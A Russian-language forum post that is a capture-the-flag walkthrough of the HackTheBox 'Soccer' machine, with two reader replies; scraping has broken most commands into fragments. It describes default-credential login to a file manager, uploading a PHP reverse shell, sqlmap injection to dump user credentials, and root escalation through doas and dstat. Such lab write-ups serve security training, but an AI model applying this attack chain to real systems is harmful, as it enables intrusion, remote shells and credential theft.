![]() |
Приветствую,
Код:
КодебайКод:
SoccerКод:
HackTheBoxРазведка Начинаем, как всегда со сканирования портов, используем флаг Код:
-sCКод:
-sVBash: Код:
nmap -sC -sVКод:
PORT STATE SERVICE VERSIONКод:
TCPКод:
22Код:
80Код:
9091Код:
80https://forum.antichat.xyz/attachmen...7600636877.png При переходе на Код:
http://10.10.11.194Код:
soccer.htbКод:
IPКод:
/etc/hostshttps://forum.antichat.xyz/attachmen...7600685422.png Теперь мы можем попасть на домен: https://forum.antichat.xyz/attachmen...7600705427.png На сайте я ничего интересного не обнаружил, поэтому решил профаззить каталоги и файлы: Bash: Код:
gobusterНашлась директория Код:
tinyhttps://forum.antichat.xyz/attachmen...7600813656.png Тут нас приветствует Код:
Tiny File ManagerКод:
CTFhttps://forum.antichat.xyz/attachmen...7600839018.png В данном случае стандартное имя пользователя для админа это Код:
adminКод:
admin@123Код:
userКод:
12345Пробуем войти от лица администратора: https://forum.antichat.xyz/attachmen...7600868419.png Взятие www-data Теперь у нас есть доступ к файловому менеджеру. Через него мы можем загрузить вредоносный Код:
PHPhttps://forum.antichat.xyz/attachmen...7600888489.png Для начала скачаем на нашу машину следующий файл - https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php: Bash: Код:
wgetЭто готовый реверс шелл, который был написан на Код:
PHPКод:
$ipКод:
IPКод:
VPNКод:
$porthttps://forum.antichat.xyz/attachmen...7600937155.png Теперь ставим листенер на порт, который мы указали в Код:
PHPhttps://forum.antichat.xyz/attachmen...7600970671.png Сразу же в каталог, в котором мы оказались изначально, загрузить файл не получилось, поэтому переходим в Код:
tinyhttps://forum.antichat.xyz/attachmen...7601001688.png Затем в Код:
uploadshttps://forum.antichat.xyz/attachmen...7601037676.png И нажимаем кнопку Код:
“Upload”https://forum.antichat.xyz/attachmen...7601065458.png Прожимаем область с текстом Код:
“Drop files here to upload”Код:
php-reverse-shell.phphttps://forum.antichat.xyz/attachmen...7601082896.png Файл загружен, теперь нужно заставить веб-сервер запустить Код:
PHPhttps://forum.antichat.xyz/attachmen...7601106421.png Нажимаем на Код:
“php-reverse-shell.php”Код:
“Open”https://forum.antichat.xyz/attachmen...7601131739.png И получаем сессию от лица пользователя веб-сервера Код:
www-datahttps://forum.antichat.xyz/attachmen...7601178856.png Стабилизируем оболочку с помощью Код:
python3Bash: Код:
python3 -c ‘import ptyК сожалению, на машине повысить привилегии в данном случае не получилось. Но мы можем обнаружить следующий конфигурационный файл Код:
Nginx’аКод:
soc-player.soccer.htbhttps://forum.antichat.xyz/attachmen...7601221481.png Вносим его в Код:
/etc/hostsКод:
soc-player.soccer.htbhttps://forum.antichat.xyz/attachmen...7601274140.png Тут мы можем посмотреть матчи, авторизоваться и зарегистрироваться. Для начала выполним последнее: https://forum.antichat.xyz/attachmen...7601317373.png Теперь авторизуемся: https://forum.antichat.xyz/attachmen...7601440679.png Отлично. Тут написано, что Код:
IDКод:
52405https://forum.antichat.xyz/attachmen...7601498079.png Попробуем ввести в форму Код:
52405https://forum.antichat.xyz/attachmen...7601552881.png Отправляем запрос и получаем Код:
“Ticket Exists”https://forum.antichat.xyz/attachmen...7601577590.png То есть данный сервис проверяет валидность нашего билета по Код:
IDКод:
SQLhttps://forum.antichat.xyz/attachmen...7601608786.png Код:
1 or 1Посмотрим исходный Код:
HTMLhttps://forum.antichat.xyz/attachmen...7601630802.png Запросы идут через веб-сокеты и Код:
9091Код:
nmapКод:
sqlmapКод:
--dbsBash: Код:
sqlmap -uКод:
1Код:
2Код:
3Код:
5Код:
soccer_dbКод:
-DКод:
--dumpBash: Код:
sqlmap -uСамое интересное это: Код: Код:
player@player.htbКод:
playerКод:
SSHhttps://forum.antichat.xyz/attachmen...7601732326.png Взятие рута Скачем программу с нашего хоста в каталог Код:
/tmpКод:
linpeashttps://forum.antichat.xyz/attachmen...7601758208.png Даём права на запуск ( Код:
+xКод:
/usr/local/bin/doasКод:
SUIDhttps://forum.antichat.xyz/attachmen...7601789603.png Код:
DoasКод:
sudoКод:
doasКод:
doas.confhttps://forum.antichat.xyz/attachmen...7601817766.png Ищем конфиг с помощью Код:
whereisКод:
/usr/bin/dstathttps://forum.antichat.xyz/attachmen...7601837355.png Запуск Код:
dstatКод:
doasКод:
GTFOBINSКод:
dstathttps://forum.antichat.xyz/attachmen...7601866309.png Нам нужна вкладка Код:
“Sudo”https://forum.antichat.xyz/attachmen...7601900498.png Рут получен. Огромное спасибо, что дочитали статью до конца. Если есть какие-то ошибки/неточности, то, пожалуйста, напишите об этом в комментариях |
Очередная отличная статья! Огромное спасибо за обзор прохождений, это реально помогает))
|
Вот такие же статьи по Antichat.games хотел бы видеть. Как пожелание
|
| Время: 09:23 |